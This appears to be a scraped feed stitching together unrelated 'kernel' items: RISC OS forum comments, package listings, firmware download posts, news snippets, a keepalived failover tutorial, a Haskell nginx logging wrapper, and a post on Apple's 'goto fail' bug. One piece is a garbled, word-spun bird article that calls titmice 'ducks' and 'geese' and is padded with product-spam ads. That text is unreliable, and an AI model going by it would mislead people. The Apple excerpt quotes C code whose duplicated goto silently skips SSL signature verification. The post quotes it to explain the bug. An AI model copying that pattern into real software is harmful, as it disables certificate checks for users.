ARX and other thoughts   
To me the biggest problem with RISC OS as a modern platform is its fragility. The lack of pre-emptive multi-tasking and decent memory protection are big problems. These problems IMHO limit its usefulness as an embedded or PDA OS. Indeed IMHO RISC OS is probably a worse starting point for a PDA OS than Linux. The GUI is not at all suited to pen-based working, so it would need to be replaced. (PDA pens don't have buttons, so what do you do for menus?) What that leaves you with that is of use is the kernel, Filer, Font Manager, and Draw Module. Whilst the Font Manager used to kick arse, it's now looking quite dated, and the Draw Module was always lacking. What's sad is that Acorn were developing another OS for the Archimedes. It was called ARX, and was being developed at the Acorn Palo Alto Research Centre. It was to be a modern OS, with memory protection and pre-emptive multi-tasking like Unix, with a GUI similar to Mac OS - the guys working on it were experts in OS design. Unfortunately the project was poorly managed (as most Acorn projects were). Management decided to kill the project because the predicted finish date was long after the launch date for the Archimedes - Arthur was thrown together in a hurry, and the rest is history. For those that don't know, Arthur was essentially developed by a bunch of BBC Micro games developers who had little experience in OS design. I believe that none of the folks that had been working on ARX worked on Arthur. It was designed to be compatible (to an extent) with the earlier BBC Micro OS - much of the early software on Archimedes machines was ports of BBC Micro apps. It was never really designed to be a serious OS. IMHO what Acorn should have done was get in some decent management for the ARX project. Had they done that they'd have ended up with a serious computer system and things may have turned out differently. They could potentially have competed in the spaces that Unix and Mac OS were dominating. Unfortunately Arthur meant they were only suited to the education and hobbyist market.
          RE: Is it just me...   
No, it's not just you, there's very little in the article that seems to relate to its title. Shared source for RISC OS seems to me to be too little, too late. It's also currently fiction, since there's no source published. I'm not really convinced that anything can be done for RISC OS to bring back users. There's several reasons for this... 1) RISC OS is closely tied to a single processor ARM architecture, which inherently restricts its speed, since there are no 3GHz ARM chips. Performance will therefore never be competitive without major re-writes of most of the OS. 2) The hardware cost, as a minority platform, also makes things prohibitive. Hardware price will therefore never be even remotely competitive. 3) Porting to a different platform is impractical (at best) owing to a reliance on ARM code. You'd either need ARM emulation integrated into the kernel, or you'd loose compatibility. 4) Running under emulation also isn't practical as a means of survival - you'll inevitably gradually lose users to the host OS.
          RE[7]: ARX and other thoughts   
Yeah, open source would be great. My grandmother can't wait to compile the latest kernel...
          RE[8]: ARX and other thoughts   
The open source OpenOffice and Firefox packages (which are also available for Windows) don't have kernels, let alone ones you have to compile. And you don't have to compile the kernel on most distros anyway. It's FUD like that which prevents Linux users taking Windows users seriously. The sad part is that although my memory may be faulty on the point, I seem to remember that tomcat wasn't always so full of anti-FOSS/Linux crap.
          RE[8]: ARX and other thoughts   
"My grandmother can't wait to compile the latest kernel..." Pft! Noobs. My grandmother is a kernel programmer :p
          RE[2]: ARX and other thoughts   
Acorn were busy working on their Galileo OS when they folded. The plan for RISC OS was to replace the kernel with the new Galileo kernel, which would have supported pre-emptive multi-tasking and memory protection. I can see no reason why this wouldn't have worked and maintained application compatibility. The way that RISC OS apps work is by running in a loop continuously asking the windowing system what's happening, and it's at this point that the windowing system gives control to other applications before responding. A pre-emptive aware version of the RISC OS windowing system potentially wouldn't need to give control over to other applications. Unfortunately a project like Galileo is a major undertaking - almost certainly beyond the abilities of Castle or RISC OS Ltd, even if they put their differences aside and worked on it together.
          Economist on "HFT bros, put down your latency arbs and explain this:"   

work hours are great, you learn about all the latest in chip design, fpgas, linux kernels, gpus; best technology, ; a ton of data to run ml models on; very low key ( no clients) ; everything is free;

only downside is that it is a shrinking business, the best years were in the past


          Linux Plumbers Conference: Containers Microconference accepted into Linux Plumbers Conference   

Following on from the Containers Microconference last year, we’re pleased to announce there will be a follow on at Plumbers in Los Angeles this year.

The agenda for this year will focus on unsolved issues and other problem areas in the Linux Kernel Container interfaces with the goal of allowing all container runtimes and orchestration systems to provide enhanced services.  Of particular interest is the unprivileged use of container APIs in which we can use both to enable self containerising applications as well as to deprivilege (make more secure) container orchestration systems.  In addition we will be discussing the potential addition of new namespaces: (LSM for per-container security modules; IMA for per-container integrity and appraisal, file capabilities to allow setcap binaries to run within unprivileged containers)

For more details on this, please see this microconference’s wiki page.

We hope to see you there!


          linux-zen 4.11.8-1 x86_64   
The Linux-zen kernel and modules
          linux-zen-docs 4.11.8-1 x86_64   
Kernel hackers manual - HTML documentation that comes with the Linux-zen kernel
          linux-zen-headers 4.11.8-1 x86_64   
Header files and scripts for building modules for Linux-zen kernel
          linux-zen 4.11.8-1 i686   
The Linux-zen kernel and modules
          linux-zen-docs 4.11.8-1 i686   
Kernel hackers manual - HTML documentation that comes with the Linux-zen kernel
          linux-zen-headers 4.11.8-1 i686   
Header files and scripts for building modules for Linux-zen kernel
          bbswitch-dkms 0.8-69 x86_64   
Kernel module allowing to switch dedicated graphics card on Optimus laptops
          bbswitch 0.8-69 x86_64   
Kernel module allowing to switch dedicated graphics card on Optimus laptops
          bbswitch-dkms 0.8-69 i686   
Kernel module allowing to switch dedicated graphics card on Optimus laptops
          bbswitch 0.8-69 i686   
Kernel module allowing to switch dedicated graphics card on Optimus laptops
          The Amazon's new danger: Brazil sets sights on palm oil   
Brazil’s ambition to become a palm oil giant could have devastating social and environmental impacts if the move is not carefully managed, say experts Tom Levitt in Brasília and Heriberto Araujo The Guardian 29 Jun 17; Jorge Antonini takes a palm kernel in his hands and slices it open. Squeezing it between his fingers, the kernel oozes the oily liquid found in hundreds of everyday products, from cakes to chocolate spread. The scientist is standing on a government-owned farm near the Brazilian capital of Brasília. Here, he and a small group of colleagues from Embrapa, the powerful...

this is a summary, for the full version visit the wild news blog
          kernel-4.11.8-1-x86_64   
kernel-4.11.8-1-x86_64
          phpzm/kernel (1.5.0)   
Simples Kernel package
          Oma7144 on Ifive mini 4s   

Use the LineAgeOS flashpack. Just change kernel and resource in folder rockdev/image.

- Oma -


          Oma7144 on [ RK3288 ROM ] IFive Air LineAgeOS 14.1 custom root firmware (2017/03/04)   

Goodix touch.

[ 1.607117] input: Goodix Capacitive TouchScreen as /devices/virtual/input/input2
[ 1.607255] <<-GTP-INFO->> GTP works in interrupt mode.
[ 1.607534] <<-GTP-INFO->> IC VERSION:9271_1040
[ 1.607544] <<-GTP-INFO->> Applied memory size:2562
[ 1.607561] <<-GTP-INFO->> Create proc entry success!

Pls check this kernel: http://crewrktablets.arctablet.com/?wpfb_dl=3103

http://crewrktablets.arctablet.com/?wpfb_dl=3104

- Oma -


          Oma7144 on [ RK3288 ROM ] IFive Mini 4 LineAgeOS 14.1 custom root firmware (2017/06/09)   

MiGHT. said
8. Please change touch-update-frequency to every 3 or 2 pixel (now is 6 i believe)

Not really.

Waiting on another users feedback to finalize the touch. You corrupted your touch controller by flashing a strange firmware into it. All what can be done is to "half the touch" which has the reported side effect.

As for other issues pls install the latest Ifive Air v1.2.4 build: http://crewrktablets.arctablet.com/?wpfb_dl=3060

with the latest Mini 4 kernel (change in folder rockdev/Image before flash): http://crewrktablets.arctablet.com/?wpfb_dl=3095

and the Mini 4 model fix (install in TWRP): http://crewrktablets.arctablet.com/?wpfb_dl=3097

For reporting battery stats pls use BatterySpy (see Play Store). Let Android learn the stats at least two cycles before reporting back.

- Oma -


          Oma7144 on Ifive mini 4s   

This is kernel related. The stock kernel is a bit strange.

There is also a lot of HDMI stuff in it. Does the tab have HDMI?

- Oma -


          Oma7144 on Ifive mini 4s   

I guess we need to do an own kernel for the tab. Maybe early next week.

- Oma -


          Akin to oscine houses solitary    
I just had to come up in from my curtilage and exchange letters this article astir one of the songbirds that I admiration to see all year. The Oak Titmouse (also well-known as the Plain Titmouse until the taxonomic group was slot into the Oak Titmouse and the Juniper Titmouse in 1997) is a joy to scrutinize. These ducks are exceptionally immediate and hardly of all time hang on inactive tremendously long. They worship to fly downfield to the sunflower kernel feeder, clutch a kernel valid quick, later fly aft up into the upper branches of the oak tree and thump the nut get underway patch retentive it near their feet resistant the limb to get to the meat.The Oak Titmouse is a small, 5 3/4 linear unit tall, brown-tinged grey vertebrate next to a wee clustering or line. They unfilmed period of time bulging on the Pacific incline from rebel Oregon southward finished California west of the Sierra Nevada to Baja California. They prefer widen woodlands of warm, dry oak and oak-pine at low to mid-elevations. It will catnap in tree cavities, overrun leaves or birdhouses. When roosting in foliage, the titmouse chooses a branchlet enclosed by unkempt plant organ or an group of late true pine needles, simulating a roost in a hole. They will pronto form in birdhouses hugely akin to oscine houses solitary beside a 1 1/4 in approach.Titmice profile pairs or slim groups, but do not fashion king-sized flocks. They may weave mixed-species flocks after the breeding period for hunting. The Oak Titmouse family unit for being and pairs watch over year-round territories that can be 2 to 5 demesne in vastness. They eat insects and spiders (and we gardeners be keen on them for that), and are sometimes seen contractable insects in midair! They will too give somebody a lift berries, acorns and whatever seeds. They be passionate about helianthus seeds. They will pasturage on foliage, twigs, branches, shorts and on occasion on the ground. They are attracted to feeders with suet, peanut dairy product and helianthus seeds.Post ads:12V 55AH SLA Battery for Pride Mobility Scooter - 2PK / 12V 55AH SLA Battery replaces UPS12-170 UB12550 22NF - 2PK / 30-3012 Part 30-3012 - Cannula Endometrial Biopsy / 3B Scientific African torso unisex 16 parts / 4.0 X Headband Loupes Magnifier Dental Surgical Medical / 5653560 / 8 8Pc Glue Stick Case Pack 96 8 8Pc Glue Stick Case Pack / About Time, Whey Isolate Protein Unflavourd, 2.0 Lb (Pack / Acticoat Burn Dressing by Smith & Nephew Incorporated - / Aj Siris Sicara Cosmetic Bags - Case Pack 11 SKU-PAS903927 / ALECO Bulk Rolls of Strips / Amputee Wheelchair Surface Gel RIGHT / Antelope Professional Hair Cutting Scissors Shear D026030M / APPLICATOR, COTTON TIP, PLASTIC, 3",STERILE ( APPLICATOR, / Aqualight 24 T - 5 Ho Double Lamp Strip By BND / B848/PB 8 LITE 48" BATHROOM FIX 6PK SUNLITE 6 PK / Bar Soap, Lemon Verbena , 8 oz ( Value Bulk Multi-pack) / Bewitched Monofilament Lace Wig by Raquel Welch / Boswellin Extract 300mg - 60 - Capsule (MULTI-PACK)The Oak Titmouse is one of my favourite geese to ticker in my own yard. If you can get a pair to descent in your yard or on your chattels you will adulation them too!
          Varšavská burza potřetí v záporu   
Index WIG 30 oslabil o 0,9 % na 2663,68 b.brbrpVaršavská burza potřetí v řadě ztrácela. Nejhorší výkon v pátek podaly akcie plynařské společnosti PGNiG (PGN; -3,1 %), Kernelu (KER; -3 %) a zpracovatele ropy PKN Orlen (PKN; -2,7 %). Ten dnes měl...
          Deploying Highly Available Virtual Interfaces With Keepalived   

Linux is a powerhouse when it comes to networking, and provides a full featured and high performance network stack. When combined with web front-ends such asHAProxylighttpdNginxApache or your favorite application server, Linux is a killer platform for hosting web applications. Keeping these applications up and operational can sometimes be a challenge, especially in this age of horizontally scaled infrastructure and commodity hardware. But don't fret, since there are a number of technologies that can assist with making your applications and network infrastructure fault tolerant.

One of these technologies, keepalived, provides interface failover and the ability to perform application-layer health checks. When these capabilities are combined with the Linux Virtual Server (LVS) project, a fault in an application will be detected by keepalived, and the virtual interfaces that are accessed by clients can be migrated to another available node. This article will provide an introduction to keepalived, and will show how to configure interface failover between two or more nodes. Additionally, the article will show how to debug problems with keepalived and VRRP.

What Is Keepalived?


The keepalived project provides a keepalive facility for Linux servers. This keepalive facility consists of a VRRP implementation to manage virtual routers (aka virtual interfaces), and a health check facility to determine if a service (web server, samba server, etc.) is up and operational. If a service fails a configurable number of health checks, keepalived will fail a virtual router over to a secondary node. While useful in its own right, keepalived really shines when combined with the Linux Virtual Server project. This article will focus on keepalived, and a future article will show how to integrate the two to create a fault tolerant load-balancer.

Installing KeepAlived From Source Code


Before we dive into configuring keepalived, we need to install it. Keepalived is distributed as source code, and is available in several package repositories. To install from source code, you can execute wget or curl to retrieve the source, and then run "configure", "make" and "make install" compile and install the software:

$ wget http://www.keepalived.org/software/keepalived-1.1.17.tar.gz  $ tar xfvz keepalived-1.1.17.tar.gz   $ cd keepalived-1.1.17  $ ./configure --prefix=/usr/local  $ make && make install 

In the example above, the keepalived daemon will be compiled and installed as /usr/local/sbin/keepalived.

Configuring KeepAlived


The keepalived daemon is configured through a text configuration file, typically named keepalived.conf. This file contains one or more configuration stanzas, which control notification settings, the virtual interfaces to manage, and the health checks to use to test the services that rely on the virtual interfaces. Here is a sample annotated configuration that defines two virtual IP addresses to manage, and the individuals to contact when a state transition or fault occurs:

# Define global configuration directives global_defs {     # Send an e-mail to each of the following     # addresses when a failure occurs    notification_email {        matty@prefetch.net        operations@prefetch.net    }    # The address to use in the From: header    notification_email_from root@VRRP-director1.prefetch.net     # The SMTP server to route mail through    smtp_server mail.prefetch.net     # How long to wait for the mail server to respond    smtp_connect_timeout 30     # A descriptive name describing the router    router_id VRRP-director1 }  # Create a VRRP instance  VRRP_instance VRRP_ROUTER1 {      # The initial state to transition to. This option isn't     # really all that valuable, since an election will occur     # and the host with the highest priority will become     # the master. The priority is controlled with the priority     # configuration directive.     state MASTER      # The interface keepalived will manage     interface br0      # The virtual router id number to assign the routers to     virtual_router_id 100      # The priority to assign to this device. This controls     # who will become the MASTER and BACKUP for a given     # VRRP instance.     priority 100      # How many seconds to wait until a gratuitous arp is sent     garp_master_delay 2      # How often to send out VRRP advertisements     advert_int 1      # Execute a notification script when a host transitions to     # MASTER or BACKUP, or when a fault occurs. The arguments     # passed to the script are:     #  $1 - "GROUP"|"INSTANCE"     #  $2 = name of group or instance     #  $3 = target state of transition     # Sample: VRRP-notification.sh VRRP_ROUTER1 BACKUP 100     notify "/usr/local/bin/VRRP-notification.sh"      # Send an SMTP alert during a state transition     smtp_alert      # Authenticate the remote endpoints via a simple      # username/password combination     authentication {         auth_type PASS         auth_pass 192837465     }     # The virtual IP addresses to float between nodes. The     # label statement can be used to bring an interface      # online to represent the virtual IP.     virtual_ipaddress {         192.168.1.100 label br0:100         192.168.1.101 label br0:101     } } 

The configuration file listed above is self explanatory, so I won't go over each directive in detail. I will point out a couple of items:

  • Each host is referred to as a director in the documentation, and each director can be responsible for one or more VRRP instances
  • Each director will need its own copy of the configuration file, and the router_id, priority, etc. should be adjusted to reflect the nodes name and priority relative to other nodes
  • To force a specific node to master a virtual address, make sure the director's priority is higher than the other virtual routers
  • If you have multiple VRRP instances that need to failover together, you will need to add each instance to a VRRP_sync_group
  • The notification script can be used to generate custom syslog messages, or to invoke some custom logic (e.g., restart an app) when a state transition or fault occurs
  • The keepalived package comes with numerous configuration examples, which show how to configure numerous aspects of the server

Starting Keepalived


Keepalived can be executed from an RC script, or started from the command line. The following example will start keepalived using the configuration file /usr/local/etc/keepalived.conf:

$ keepalived -f /usr/local/etc/keepalived.conf 

If you need to debug keepalived issues, you can run the daemon with the "--dont-fork", "--log-console" and "--log-detail" options:

$ keepalived -f /usr/local/etc/keepalived.conf --dont-fork --log-console --log-detail 

These options will stop keepalived from fork'ing, and will provide additional logging data. Using these options is especially useful when you are testing out new configuration directives, or debugging an issue with an existing configuration file.

Locating The Router That is Managing A Virtual IP


To see which director is currently the master for a given virtual interface, you can check the output from the ip utility:

VRRP-director1$ ip addr list br0 5: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN      link/ether 00:24:8c:4e:07:f6 brd ff:ff:ff:ff:ff:ff     inet 192.168.1.6/24 brd 192.168.1.255 scope global br0     inet 192.168.1.100/32 scope global br0:100     inet 192.168.1.101/32 scope global br0:101     inet6 fe80::224:8cff:fe4e:7f6/64 scope link         valid_lft forever preferred_lft forever  VRRP-director2$ ip addr list br0 5: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN      link/ether 00:24:8c:4e:07:f6 brd ff:ff:ff:ff:ff:ff     inet 192.168.1.7/24 brd 192.168.1.255 scope global br0     inet6 fe80::224:8cff:fe4e:7f6/64 scope link         valid_lft forever preferred_lft forever 

In the output above, we can see that the virtual interfaces 192.168.1.100 and 192.168.1.101 are currently active on VRRP-director1.

Troubleshooting Keepalived And VRRP


The keepalived daemon will log to syslog by default. Log entries will range from entries that show when the keepalive daemon started, to entries that show state transitions. Here are a few sample entries that show keepalived starting up, and the node transitioning a VRRP instance to the MASTER state:

Jul  3 16:29:56 disarm Keepalived: Starting Keepalived v1.1.17 (07/03,2009) Jul  3 16:29:56 disarm Keepalived: Starting VRRP child process, pid=1889 Jul  3 16:29:56 disarm Keepalived_VRRP: Using MII-BMSR NIC polling thread... Jul  3 16:29:56 disarm Keepalived_VRRP: Registering Kernel netlink reflector Jul  3 16:29:56 disarm Keepalived_VRRP: Registering Kernel netlink command channel Jul  3 16:29:56 disarm Keepalived_VRRP: Registering gratutious ARP shared channel Jul  3 16:29:56 disarm Keepalived_VRRP: Opening file '/usr/local/etc/keepalived.conf'. Jul  3 16:29:56 disarm Keepalived_VRRP: Configuration is using : 62990 Bytes Jul  3 16:29:57 disarm Keepalived_VRRP: VRRP_Instance(VRRP_ROUTER1) Transition to MASTER STATE Jul  3 16:29:58 disarm Keepalived_VRRP: VRRP_Instance(VRRP_ROUTER1) Entering MASTER STATE Jul  3 16:29:58 disarm Keepalived_VRRP: Netlink: skipping nl_cmd msg... 

If you are unable to determine the source of a problem with the system logs, you can use tcpdump to display the VRRP advertisements that are sent on the local network. Advertisements are sent to a reserved VRRP multicast address (224.0.0.18), so the following filter can be used to display all VRRP traffic that is visible on the interface passed to the "-i" option:

$ tcpdump -vvv -n -i br0 host 224.0.0.18 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on br0, link-type EN10MB (Ethernet), capture size 96 bytes  10:18:23.621512 IP (tos 0x0, ttl 255, id 102, offset 0, flags [none], proto VRRP (112), length 40) \                 192.168.1.6 > 224.0.0.18: VRRPv2, Advertisement, vrid 100, prio 100, authtype simple,                  intvl 1s, length 20, addrs: 192.168.1.100 auth "19283746"  10:18:25.621977 IP (tos 0x0, ttl 255, id 103, offset 0, flags [none], proto VRRP (112), length 40) \                 192.168.1.6 > 224.0.0.18: VRRPv2, Advertisement, vrid 100, prio 100, authtype simple,                  intvl 1s, length 20, addrs: 192.168.1.100 auth "19283746"                          ......... 

The output contains several pieces of data that be useful for debugging problems:

authtype - the type of authentication in use (authentication configuration directive) vrid - the virtual router id (virtual_router_id configuration directive) prio - the priority of the device (priority configuration directive) intvl - how often to send out advertisements (advert_int configuration directive) auth - the authentication token sent (auth_pass configuration directive) 

Conclusion


In this article I described how to set up a host to use the keepalived daemon, and provided a sample configuration file that can be used to failover virtual interfaces between servers. Keepalived has a slew of options not covered here, and I will refer you to the keepalived source code and documentation for additional details



abin 2015-11-01 21:06 发表评论

          Why were there gotos in apple software in the first place?   

A recent vulnerability in iOS and Mac OS can boils down to a double goto resulting in making critical ssl verification code unreachable.

hashOut.data = hashes + SSL_MD5_DIGEST_LEN;
hashOut.length = SSL_SHA1_DIGEST_LEN;
if ((err = SSLFreeBuffer(&hashCtx)) != 0)
    goto fail;
if ((err = ReadyHash(&SSLHashSHA1, &hashCtx)) != 0)
    goto fail;
if ((err = SSLHashSHA1.update(&hashCtx, &clientRandom)) != 0)
    goto fail;
if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
    goto fail;
if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
    goto fail;
    goto fail;
if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
    goto fail;

/* ... */

fail:
    SSLFreeBuffer(&signedHashes);
    SSLFreeBuffer(&hashCtx);
    return err;

Since the fail label return err, no error is reported in normal conditions, making the lack of verification silent.

But gotos are bad, lol

With all the talk about goto being bad (if you haven’t, read Edsger Dijkstra’s famous go to considered harmful), it’s a wonder it could still be found in production code. In this short post I’d like to point out that while goto is generally a code smell, it has one very valid and important use in Ansi C: exception handling.

Let’s look at a simple function that makes use of goto exception handling:

char *
load_file(const char *name, off_t *len)
{
    struct stat  st;
    off_t            size;
    char            *buf = NULL;
    int            fd;

    if ((fd = open(name, O_RDONLY)) == -1)
        return (NULL);
    if (fstat(fd, &st) != 0)
        goto fail;
    size = st.st_size;
    if ((buf = calloc(1, size + 1)) == NULL)
        goto fail;
    if (read(fd, buf, size) != size)
        goto fail;
    close(fd);

    *len = size + 1;
    return (buf);

fail:
    if (buf != NULL)
        free(buf);
    close(fd);
    return (NULL);
}

Here goto serves a few purposes:

  • keep the code intent clear
  • reduce condition branching
  • allow graceful failure handling

While this excerpt is short, it would already be much more awkward to repeat the failure handling code in the body of the if statement testing for error conditions.

A more complex example shows how multiple types of “exceptions” can be handled with goto without falling into the spaghetti code trap.

void
ssl_read(int fd, short event, void *p)
{
    struct bufferevent  *bufev = p;
    struct conn           *s = bufev->cbarg;
    int                      ret;
    int                      ssl_err;
    short                      what;
    size_t                   len;
    char                       rbuf[IBUF_READ_SIZE];
    int                      howmuch = IBUF_READ_SIZE;

    what = EVBUFFER_READ;

    if (event == EV_TIMEOUT) {
        what |= EVBUFFER_TIMEOUT;
        goto err;
    }

    if (bufev->wm_read.high != 0)
        howmuch = MIN(sizeof(rbuf), bufev->wm_read.high);

    ret = SSL_read(s->s_ssl, rbuf, howmuch);
    if (ret <= 0) {
        ssl_err = SSL_get_error(s->s_ssl, ret);

        switch (ssl_err) {
        case SSL_ERROR_WANT_READ:
            goto retry;
        case SSL_ERROR_WANT_WRITE:
            goto retry;
        default:
            if (ret == 0)
                what |= EVBUFFER_EOF;
            else {
                ssl_error("ssl_read");
                what |= EVBUFFER_ERROR;
            }
            goto err;
        }
    }

    if (evbuffer_add(bufev->input, rbuf, ret) == -1) {
        what |= EVBUFFER_ERROR;
        goto err;
    }

    ssl_bufferevent_add(&bufev->ev_read, bufev->timeout_read);

    len = EVBUFFER_LENGTH(bufev->input);
    if (bufev->wm_read.low != 0 && len < bufev->wm_read.low)
        return;
    if (bufev->wm_read.high != 0 && len > bufev->wm_read.high) {
        struct evbuffer *buf = bufev->input;
        event_del(&bufev->ev_read);
        evbuffer_setcb(buf, bufferevent_read_pressure_cb, bufev);
        return;
    }

    if (bufev->readcb != NULL)
        (*bufev->readcb)(bufev, bufev->cbarg);
    return;

retry:
    ssl_bufferevent_add(&bufev->ev_read, bufev->timeout_read);
    return;

err:
    (*bufev->errorcb)(bufev, what, bufev->cbarg);
}

One could wonder why functions aren’t used in lieue of goto statements in this context, it boils down to two things: context and efficiency.

Since the canonical use case of goto is for a different termination path that handles cleanup it needs context - i.e: local variables - that would need to be carried to the cleanup function this would make for proliferation of awkward specific functions.

Additionaly, functions create additional stack frames which in some scenarios may be a concern especially in the context of kernel programming, and critical path functions.

The take-away

While there is a general sentiment that the goto statement should be avoided, which is mostly valid, it’s not a hard rule and there is, in C, a very valid use case that only goto provides.

In the case of the apple code, the error did not stem from the use of the goto statement but on an unfortunate typo.

It’s interesting to note that Edsger Dijkstra wrote his original piece at a time where conditional and loop constructs such if/then/else and while where not available in mainstream languages such as Basic. He later clarified his initial statement, saying:

Please don’t fall into the trap of believing that I am terribly dogmatical about [the goto statement]. I I have the uncomfortable feeling that others are making a religion out of it, as if the conceptual problems of programming could be solved by a single trick, by a simple form of coding discipline.

words of wisdom.


          Solving Nginx logging in 60 lines of Haskell   

Nginx is well-known for only logging to files and being unable to log to syslog out of the box.

There are a few ways around this, one that is often proposed is creating named pipes (or FIFOs) before starting up nginx. Pipes have the same properties than regular files in UNIX (to adhere to the important notion that everything is a file in UNIX), but they expect data written to them to be consumed by another process at some point. To compensate for the fact that consumers might sometimes be slower than producers they maintain a buffer of readily available data, with a hard maximum of 64k in Linux systems for instance.

Small digression: understanding linux pipes max buffer size

It can be a bit confusing to figure out what the exact size of FIFO buffer is in linux. Our first reflex will be to look at the output of ulimit

# ulimit -a
core file size          (blocks, -c) 0
data seg size           (kbytes, -d) unlimited
scheduling priority             (-e) 30
file size               (blocks, -f) unlimited
pending signals                 (-i) 63488
max locked memory       (kbytes, -l) unlimited
max memory size         (kbytes, -m) unlimited
open files                      (-n) 1024
pipe size            (512 bytes, -p) 8
POSIX message queues     (bytes, -q) 819200
real-time priority              (-r) 99
stack size              (kbytes, -s) 8192
cpu time               (seconds, -t) unlimited
max user processes              (-u) 63488
virtual memory          (kbytes, -v) unlimited
file locks                      (-x) unlimited

Which seems to indicate that the available pipe size in bytes is 512 * 8, amounting to 4kb. Turns out, this is the maximum atomic size of a payload on a pipe, but the kernel reserves several buffers for each created pipe, with a hard limit set in https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/tree/include/linux/pipe_fs_i.h?id=refs/tags/v3.13-rc1#n4.

The limit turns out to be 4096 * 16, amounting to 64kb, still not much.

Pipe consumption strategies

Pipes are tricky beasts and will bite you if you try to consume them from syslog-ng or rsyslog without anything in between. First lets see what happens if you write on a pipe which has no consumer:

$ mkfifo foo
$ echo bar > foo

bash

That’s right, having no consumer on a pipe results in blocking writes which will not please nginx, or any other process which expects logging a line to a file to be a fast operation (and in many application will result in total lock-up).

Even though we can expect a syslog daemon to be mostly up all the time, it imposes huge availability constraints on a system daemon that can otherwise safely sustain short availability glitches.

A possible solution

What if instead of letting rsyslog do the work we wrapped the nginx process in with a small wrapper utility, responsible for pushing logs out to syslog. The utility would:

  • Clean up old pipes
  • Provision pipes
  • Set up a connection to syslog
  • Start nginx in the foreground, while watching pipes for incoming data

The only requirement with regard to nginx’s configuration is to start it in the foreground, which can be enabled with this single line in nginx.conf:

daemon off;

Wrapper behavior

We will assume that the wrapper utility receives a list of command line arguments corresponding to the pipes it has to open, if for instance we only log to /var/log/nginx/access.log and /var/log/nginx/error.log we could call our wrapper - let’s call it nginxpipe - this way:

nginxpipe nginx-access:/var/log/nginx/access.log nginx-error:/var/log/nginx/error.log

Since the wrapper would stay in the foreground to watch for its child nginx process, integration in init scripts has to account for it, for ubuntu’s upstart this translates to the following configuration in /etc/init/nginxpipe.conf:

respawn
exec nginxpipe nginx-access:/var/log/nginx/access.log nginx-error:/var/log/nginx/error.log

Building the wrapper

For once, the code I’ll show won’t be in clojure since it does not lend itself well to such tasks, being hindered by slow startup times and inability to easily call OS specific functions. Instead, this will be built in haskell which lends itself very well to system programming, much like go (another more-concise-than-c system programming language).

First, our main function:

main = do
  mainlog <- openlog "nginxpipe" [PID] DAEMON NOTICE
  updateGlobalLogger rootLoggerName (setHandlers [mainlog])
  updateGlobalLogger rootLoggerName (setLevel NOTICE)
  noticeM "nginxpipe" "starting up"
  args <- getArgs
  mk_pipes $ map get_logname args
  noticeM "nginxpipe" "starting nginx"
  ph <- runCommand "nginx"
  exit_code <- waitForProcess ph
  noticeM "nginxpipe" $ "nginx stopped with code: " ++ show exit_code

We start by creating a log handler, then using it as our only log destination throughout the program. We then call mk_pipes which will look on the given arguments and finally start the nginx process and wait for it to return.

The list of argument given to mk_pipes is slightly modified, it transforms the initial list consisting of

[ "nginx-access:/var/log/nginx/access.log", "nginx-error:/var/log/nginx/error.log"]

into a list of string-tuples:

[("nginx-access","/var/log/nginx/access.log"), ("nginx-error","/var/log/nginx/error.log")]

To create this modified list which just map our input list with a simple function:

is_colon x = x == ':'
get_logname path = (ltype, p) where (ltype, (_:p)) = break is_colon path

Next up is the pipe creation, since Haskell has no loop we use tail recursion to iterate on the list of tuples:

mk_pipes :: [(String,String)] -> IO ()
mk_pipes (pipe:pipes) = do
  mk_pipe pipe
  mk_pipes pipes
mk_pipes [] = return ()

The bulk of work happens in the mk_pipe function:

mk_pipe :: (String,String) -> IO ()
mk_pipe (ltype,path) = do
  safe_remove path
  createNamedPipe path 0644
  fd <- openFile path ReadMode
  hSetBuffering fd LineBuffering
  void $ forkIO $ forever $ do
    is_eof <- hIsEOF fd
    if is_eof then threadDelay 1000000 else get_line ltype fd

The intersting bit in that function is the last 3 lines, where we create a new “IO Thread” with forkIO inside which we loop forever waiting for input for at most 1 second, logging to syslog when new input comes in.

The two remaining functions get_line and safe_remove have very simple definitions, I intentionnaly left a small race-condition in safe_remove to make it more readable:

safe_remove path = do
  exists <- doesFileExist path
  when exists $ removeFile path

get_line ltype fd = do
  line <- hGetLine fd
  noticeM ltype line

I’m not diving into each line of the code, there is plenty of great litterature on haskell, I’d recommmend “real world haskell” as a great first book on the language.

I just wanted to show-case the fact that Haskell is a great alternative for building fast and lightweight system programs.

The awesome part: distribution!

The full source for this program is available at https://github.com/pyr/nginxpipe, it can be built in one of two ways:

  • Using the cabal dependency management system (which calls GHC)
  • With the GHC compiler directly

With cabal you would just run:

cabal install --prefix=/somewhere

Let’s look at the ouput:

$ ldd /somewhere/bin/nginxpipe 
linux-vdso.so.1 (0x00007fffe67fe000)
librt.so.1 => /usr/lib/librt.so.1 (0x00007fb8064d8000)
libutil.so.1 => /usr/lib/libutil.so.1 (0x00007fb8062d5000)
libdl.so.2 => /usr/lib/libdl.so.2 (0x00007fb8060d1000)
libpthread.so.0 => /usr/lib/libpthread.so.0 (0x00007fb805eb3000)
libgmp.so.10 => /usr/lib/libgmp.so.10 (0x00007fb805c3c000)
libm.so.6 => /usr/lib/libm.so.6 (0x00007fb805939000)
libgcc_s.so.1 => /usr/lib/libgcc_s.so.1 (0x00007fb805723000)
libc.so.6 => /usr/lib/libc.so.6 (0x00007fb805378000)
/lib64/ld-linux-x86-64.so.2 (0x00007fb8066e0000)
$ du -sh /somewhere/bin/nginxpipe
1.9M /somewhere/bin/nginxpipe

That’s right, no crazy dependencies (for instance, this figures out the correct dependencies across archlinux, ubuntu and debian for me) and a smallish executable.

Obviously this is not a complete solution as-is, but quickly adding support for a real configuration file would not be a huge endeavour, where for instance an alternative command to nginx could be provided.

Hopefully this will help you consider haskell for your system programming needs in the future!


          Fedora freezes during shutdown and other commands on kernel kernel-4.11.7-200.fc25.x86_64   
